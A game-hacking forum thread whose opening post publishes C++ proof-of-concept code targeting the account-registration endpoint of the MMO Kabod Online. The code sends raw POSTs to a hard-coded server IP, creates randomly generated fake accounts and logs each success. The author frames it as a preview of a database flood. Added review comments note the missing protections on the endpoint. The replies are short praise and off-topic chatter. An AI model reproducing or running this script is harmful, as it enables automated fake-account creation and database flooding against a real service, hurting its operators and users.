POST/GET without wsock wrapper - Old Royal Hack Forum


POST/GET without wsock wrapper


    POST/GET without wsock wrapper

    This is something that I made for the last MMO I tried, called Kabod Online (sadly, I have reported this issue to them and it's still not fixed after 4 weeks).

    This will show you how to properly build a POST/GET request without using the WinINet APIs.

    Code:
    /*
    KID POC -> lack of security in the account system ( FAKE USERS ), resulting in a database flood.
    I will not release a true flooder because I do not want their website/database damaged by ill-intentioned users.
    */
    #pragma comment(lib,"wsock32.lib")
    #include <windows.h>
    #include <stdio.h>
    #include <string>
    #include <sstream>
    #include <fstream>
    
    // Alphabet every generated field is drawn from: 26 upper-case letters,
    // 26 lower-case letters and 10 digits (62 symbols in total).
    std::string m_characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
    
    // Mail domains used for the "userEmail2" form field; indexed 0..2 by the caller.
    static CHAR* m_emails [ 3 ] = { "hotmail.com", "gmail.com", "yahoo.com" };
    
    // Returns a value in the inclusive interval [_min, _max], derived from the
    // C runtime's rand().
    //
    // The result is rand() reduced modulo the interval width, shifted by _min.
    // rand() is a small, seed-determined generator, so the output is predictable
    // once the seed is known, and the modulo step is not perfectly uniform.
    // NOTE(review): if ( _max + 1 ) - _min evaluates to 0 the modulo divides by
    // zero; none of the calls in this listing pass such a pair.
    UINT GenerateInRange( UINT _min, UINT _max ) 
    {
    	const UINT width = ( _max + 1 ) - _min;
    	const UINT offset = static_cast< UINT >( rand( ) ) % width;
    
    	return offset + _min;
    }
    
    // Builds the complete text of one HTTP/1.1 POST to
    // /08member/member_join03_tempok.asp: a fixed header block followed by a
    // form-urlencoded body whose field values are generated from rand().
    //
    // _seed : handed to srand(), so every generated value is a pure function of it.
    // _data : out-parameter; receives the form text as it stands right after the
    //         account name was appended, i.e. "id_chk=Y&userAccount=<14 chars>".
    // Returns the request text (headers, blank line, body).
    //
    // NOTE(review): the request carries no cookie, session token or challenge
    // answer, and the Referer / User-Agent values are fixed strings. The caller's
    // success check and the status.txt excerpt posted with this listing suggest the
    // server accepted it, i.e. registration was reachable through a single stateless
    // POST. The server-side controls one would expect on such an endpoint are
    // per-client rate limiting, a challenge (e.g. CAPTCHA), e-mail confirmation
    // before the account is persisted, and range validation of every field.
    // The header block is byte-identical on every call, which gives log analysis a
    // stable pattern to match on.
    std::string GeneratePacket( UINT _seed, std::string *_data )
    {
    	std::stringstream _form,_packet;
    	std::string _gen;
    
    	// Re-seeds the CRT generator on every call; all draws below follow from _seed.
    	srand( _seed );
     
    	// Static request line and headers. Content-Length is left open here and is
    	// completed once the body has been assembled.
    	_packet << "POST /08member/member_join03_tempok.asp HTTP/1.1";
    	_packet << "\r\nAccept: text/html, application/xhtml+xml, */*";
    	_packet << "\r\nReferer: http://kabodonline.net/08member/member_join01_rule.asp";
    	_packet << "\r\nAccept-Language: en-US";
    	_packet << "\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)";
    	_packet << "\r\nContent-Type: application/x-www-form-urlencoded";
    	_packet << "\r\nAccept-Encoding: gzip, deflate";
    	_packet << "\r\nHost: kabodonline.net";
    	_packet << "\r\nConnection: Keep-Alive";
    	_packet << "\r\nCache-Control: no-cache";
    	_packet << "\r\nContent-Length: ";
    
    	_form << "id_chk=Y&userAccount=";
    	
    	for( INT i = 0; i < 14; i++ ) //Username
    		_form << m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ];
    
    	// Snapshot for the caller's log: field prefix plus the generated account name.
    	*_data = _form.str();
    
    	for( INT i = 0; i < 14; i++ ) //Password
    		_gen += m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ];
    
    	// The same generated password fills both the password and the confirmation field.
    	_form << "&userPass1=" << _gen.c_str( ) << "&userPass2=" << _gen.c_str( );
    
    	_gen.clear( );
    
    	for( INT i = 0; i < 14; i++ )//Email
    		_gen += m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ];
    
    	// userEmail1 is 14 generated characters, userEmail2 one of the three m_emails entries.
    	_form << "&userEmail1=" << _gen.c_str( )  << "&userEmail2=" << m_emails[ GenerateInRange( 0, 2 ) ];
    	_gen.clear( );
    
    	//NOT CRUCIAL BUT STILL LAZY FROM THEM -.-' ( YEAR = MONTH ) ( MONTH = DAY ) ( DAY = YEAR ) 
    	// Per the author's note above, the server's birthday field names are rotated, so
    	// the value sent as "birthdayYear" is meant as a month, and so on.
    	// NOTE(review): the first two ranges include 0; whether the server rejects
    	// such a value is not visible from this listing.
    	_form << "&birthdayYear=" << GenerateInRange( 0, 12 );
    	_form << "&birthdayMonth=" << GenerateInRange( 0, 27 );
    	_form << "&birthdayDay=" << GenerateInRange( 1900, 1990 );
    	_form << "&x=" << GenerateInRange( 0, 200 );
    	_form << "&y=" << GenerateInRange( 0, 200 );
    	
    	// Complete the Content-Length header with the body's byte count, then append
    	// the blank line and the body itself.
    	_packet << _form.str( ).length() << "\r\n\r\n" << _form.str( );
    	// stringstream::clear() resets the stream's state flags only; it does not
    	// empty the buffer. It has no visible effect here, as _form is not used again.
    	_form.clear( );
    
    	return _packet.str( );
    }
    
    // Sends one generated registration request over a raw TCP socket to a
    // hard-coded IPv4 address on port 80, reads the whole response and reports
    // whether it contains the string "url=member_join4_complete.asp".
    //
    // _info : forwarded to GeneratePacket() as its out-parameter; it is written
    //         before connect() is attempted, so it is set even when this function fails.
    // Returns TRUE only when the marker string was found in the response; FALSE on
    // any Winsock error or when the marker is absent.
    //
    // NOTE(review): the form (including the generated password) travels as
    // cleartext HTTP, as the port 80 destination and the "http://" Referer show.
    BOOL SendFlood( std::string *_info )
    {
    	WSADATA _data;
    	std::stringstream _recv;
    	struct sockaddr_in _service;
    
    	// MAX_SIZE_SECURITY_ID is not defined in this listing; presumably it comes in
    	// through <windows.h>. It is used here only as the receive-buffer size.
    	char _buffer [ MAX_SIZE_SECURITY_ID ] = { NULL };
    
    	if( WSAStartup( MAKEWORD( 2, 2 ), &_data ) != NO_ERROR )
    		return FALSE;
    
    	SOCKET _socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
    
    	// NOTE(review): this early return skips WSACleanup() although WSAStartup()
    	// succeeded; every later failure path does call it.
    	if( _socket == INVALID_SOCKET )
    		return FALSE;
    
    	// Destination is fixed in the binary: no DNS lookup is performed.
    	_service.sin_family = AF_INET;
    	_service.sin_addr.s_addr = inet_addr( "121.88.250.136" );
    	_service.sin_port = htons( 80 );
    
    	// Seeded with the millisecond tick counter, so the generated fields differ
    	// between calls made at different ticks.
    	std::string _packet = GeneratePacket( GetTickCount( ), _info );
    
    	if( connect( _socket, reinterpret_cast< SOCKADDR* >( &_service ), sizeof( _service ) ) == SOCKET_ERROR ) 
    	{
    		closesocket( _socket );
    		WSACleanup( );
    		return FALSE;
    	}
    
    	// A single send() call; a partial send (return value smaller than the
    	// request length) is not detected.
    	if( send( _socket, _packet.c_str( ), _packet.length( ), 0 ) == SOCKET_ERROR )
    	{
    		closesocket( _socket );
    		WSACleanup( );
    		return FALSE;
    	}
    
    	// 1 is SD_SEND: half-close the connection for sending, keep receiving.
    	if( shutdown( _socket, 1 ) == SOCKET_ERROR )
    	{
    		closesocket( _socket );
    		WSACleanup( );
    		return FALSE;
    	}
    
    	INT _result = 0;
    
    	// Drain the response until the peer closes (recv returns 0) or an error
    	// occurs (recv returns a negative value).
    	do 
    	{
    		memset( _buffer, NULL, MAX_SIZE_SECURITY_ID );
    
    		_result = recv( _socket, _buffer, MAX_SIZE_SECURITY_ID, 0 );
    
    		if( _result == NULL )
    			break;
    		
    		// NOTE(review): _buffer is streamed as a C string. When recv() fills all
    		// MAX_SIZE_SECURITY_ID bytes there is no terminating NUL and the insertion
    		// reads past the array; a NUL byte inside the data truncates the chunk.
    		// Receiving at most size - 1 bytes, or appending exactly _result bytes,
    		// would avoid both.
    		_recv << _buffer;
    
    	}while( _result > 0 );
    
    	if( closesocket( _socket ) == SOCKET_ERROR ) 
    	{
    		WSACleanup( );
    		return FALSE;
    	}
    
    	WSACleanup();
    
    	// Success is inferred purely from a substring of the response text.
    	return _recv.str( ).find( "url=member_join4_complete.asp" ) != std::string::npos ? TRUE : FALSE;
    }
    
    // Program entry point: shows a start dialog, makes five calls to SendFlood()
    // and appends one line to status.txt for each call that reported success,
    // then shows an end dialog. None of the WinMain arguments are used.
    // Always returns EXIT_SUCCESS, whatever the individual attempts returned.
    INT __stdcall WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in LPSTR lpCmdLine, __in int nShowCmd )
    {
    	UNREFERENCED_PARAMETER( hInstance );
    	UNREFERENCED_PARAMETER( hPrevInstance );
    	UNREFERENCED_PARAMETER( lpCmdLine );
    	UNREFERENCED_PARAMETER( nShowCmd );
    
    	// Receives the "id_chk=Y&userAccount=<name>" text of the latest attempt.
    	std::string _info;
    
    	MessageBox( GetForegroundWindow( ), "this will take some seconds\npress ok to start the test\n", "KID POC - START", MB_OK | MB_ICONINFORMATION );
    
    	// Fixed count of five attempts, issued back to back with no delay between them.
    	for( INT i = 0; i < 5; i++ )
    	{
    		// Skip logging when the attempt failed or produced no account text.
    		if( SendFlood( &_info ) == FALSE ||  _info.empty( ) )
    			continue;
    
    		// Opened in append mode, so earlier runs' lines are kept.
    		std::ofstream _log( "status.txt", std::ios::app );
    
    		if( _log.is_open() == FALSE )
    			continue;
    
    		_log << "Created fake account: " << _info.c_str() << std::endl;
    
    		_log.close();
    	}
    
    	MessageBox( GetForegroundWindow( ), "please consult status.txt for information\npress ok to close", "KID POC - END", MB_OK | MB_ICONINFORMATION );
    
    	return EXIT_SUCCESS;
    }
    Originally posted by status.txt
    Created fake account: id_chk=Y&userAccount=7s2DUz3nHOi76x
    POC

    #2
    Re: POST/GET without wsock wrapper

    Thanks.

    Code:
    [B?] ent_proof unstuck ?? banne: moderating royalhack is dangerous too , makes u want to go thru the window 
    [B?] ent_proof unstuck ?? banne: i eat microwaved shits all the time xD



      #3
      Re: POST/GET without wsock wrapper

      lawl niceee!
